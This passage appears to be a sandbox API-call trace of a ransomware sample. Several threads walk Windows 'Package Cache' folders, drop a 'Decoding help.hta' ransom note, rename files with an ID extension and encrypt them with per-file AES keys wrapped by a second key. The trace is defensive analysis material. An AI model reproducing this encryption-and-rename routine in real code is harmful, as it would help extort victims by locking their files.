Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" [0043.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned 86 [0043.348] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0043.348] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" [0043.348] GlobalMemoryStatus (in: lpBuffer=0x12ddfd10 | out: lpBuffer=0x12ddfd10) [0043.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11047730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0043.369] CloseHandle (hObject=0x718) returned 1 [0043.369] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.369] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 374 os_tid = 0xa9c [0043.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715f0 [0043.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.348] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.349] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.349] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.349] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.349] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.349] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.349] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" [0043.349] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned 87 [0043.349] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0043.349] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" [0043.349] GlobalMemoryStatus (in: lpBuffer=0x181dfd10 | out: lpBuffer=0x181dfd10) [0043.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11017660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x71c [0043.370] CloseHandle (hObject=0x71c) returned 1 [0043.370] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.370] FindClose (in: hFindFile=0x6715f0 | out: hFindFile=0x6715f0) returned 1 Thread: id = 375 os_tid = 0xaa0 [0043.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x1831fd30 | out: lpFindFileData=0x1831fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.346] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1831fd30 | out: lpFindFileData=0x1831fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.346] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.346] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1831fd30 | out: lpFindFileData=0x1831fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xe9f9cff0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0043.346] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0043.346] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 75 [0043.346] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" [0043.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta")) returned 0xffffffff [0043.347] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x730 [0043.363] WriteFile (in: hFile=0x730, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1831fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1831fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.364] CloseHandle (hObject=0x730) returned 1 [0043.364] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.365] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0043.365] lstrlenW (lpString="state.rsm") returned 9 [0043.365] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0043.365] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 75 [0043.365] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" [0043.365] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" [0043.365] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.365] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x730 [0043.365] CreateFileMappingA (hFile=0x730, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x734 [0043.366] CryptAcquireContextA (in: phProv=0x1831fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1831fcec*=0x3448e08) returned 1 [0043.366] CryptGenKey (in: hProv=0x3448e08, Algid=0x6610, dwFlags=0x1, phKey=0x1831fce8 | out: phKey=0x1831fce8*=0x671cb0) returned 1 [0043.366] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1831fbe4, pdwDataLen=0x1831fce4 | out: pbData=0x1831fbe4*, pdwDataLen=0x1831fce4*=0x2c) returned 1 [0043.366] MapViewOfFile (hFileMappingObject=0x734, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e0) returned 0xde40000 [0043.406] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1831fbe4*, pdwDataLen=0x1831fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1831fbe4*, pdwDataLen=0x1831fcf8*=0x100) returned 1 [0043.406] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde40000*, pdwDataLen=0x1831fce4*=0x2e0, dwBufLen=0x2e0 | out: pbData=0xde40000*, pdwDataLen=0x1831fce4*=0x2e0) returned 1 [0043.406] UnmapViewOfFile (lpBaseAddress=0xde40000) returned 1 [0043.408] CloseHandle (hObject=0x734) returned 1 [0043.408] CryptDestroyKey (hKey=0x671cb0) returned 1 [0043.408] CryptReleaseContext (hProv=0x3448e08, dwFlags=0x0) returned 1 [0043.408] SetFilePointerEx (in: hFile=0x730, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.408] WriteFile (in: hFile=0x730, lpBuffer=0x1831fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1831fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1831fbe4*, lpNumberOfBytesWritten=0x1831fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.409] WriteFile (in: hFile=0x730, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1831fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1831fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.409] CloseHandle (hObject=0x730) returned 1 [0043.409] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.410] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1831fd30 | out: lpFindFileData=0x1831fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0043.410] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0043.410] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 75 [0043.410] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" [0043.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta")) returned 0x1 [0043.410] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VC_redist.x64.exe") returned -1 [0043.410] lstrlenW (lpString="VC_redist.x64.exe") returned 17 [0043.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0043.410] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 75 [0043.410] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="VC_redist.x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" [0043.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" [0043.410] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0043.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.411] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x730 [0043.411] CreateFileMappingA (hFile=0x730, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x734 [0043.411] CryptAcquireContextA (in: phProv=0x1831fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1831fcec*=0x3448e08) returned 1 [0043.412] CryptGenKey (in: hProv=0x3448e08, Algid=0x6610, dwFlags=0x1, phKey=0x1831fce8 | out: phKey=0x1831fce8*=0x671cf0) returned 1 [0043.412] CryptExportKey (in: hKey=0x671cf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1831fbe4, pdwDataLen=0x1831fce4 | out: pbData=0x1831fbe4*, pdwDataLen=0x1831fce4*=0x2c) returned 1 [0043.412] MapViewOfFile (hFileMappingObject=0x734, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbee20) returned 0x13060000 [0043.426] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1831fbe4*, pdwDataLen=0x1831fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1831fbe4*, pdwDataLen=0x1831fcf8*=0x100) returned 1 [0043.426] CryptEncrypt (in: hKey=0x671cf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13060000, pdwDataLen=0x1831fce4*=0xbee20, dwBufLen=0xbee20 | out: pbData=0x13060000*, pdwDataLen=0x1831fce4*=0xbee20) returned 1 [0044.661] UnmapViewOfFile (lpBaseAddress=0x13060000) returned 1 [0044.670] CloseHandle (hObject=0x734) returned 1 [0044.670] CryptDestroyKey (hKey=0x671cf0) returned 1 [0044.670] CryptReleaseContext (hProv=0x3448e08, dwFlags=0x0) returned 1 [0044.670] SetFilePointerEx (in: hFile=0x730, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.670] WriteFile (in: hFile=0x730, lpBuffer=0x1831fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1831fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1831fbe4*, lpNumberOfBytesWritten=0x1831fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.671] WriteFile (in: hFile=0x730, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1831fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1831fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.671] CloseHandle (hObject=0x730) returned 1 [0044.679] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.679] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1831fd30 | out: lpFindFileData=0x1831fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0044.679] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 376 os_tid = 0xaa8 [0043.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x1845fd30 | out: lpFindFileData=0x1845fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671bb0 [0043.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.350] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1845fd30 | out: lpFindFileData=0x1845fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.350] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.350] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1845fd30 | out: lpFindFileData=0x1845fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad7040, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x105e7220, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0043.350] lstrcpyW (in: 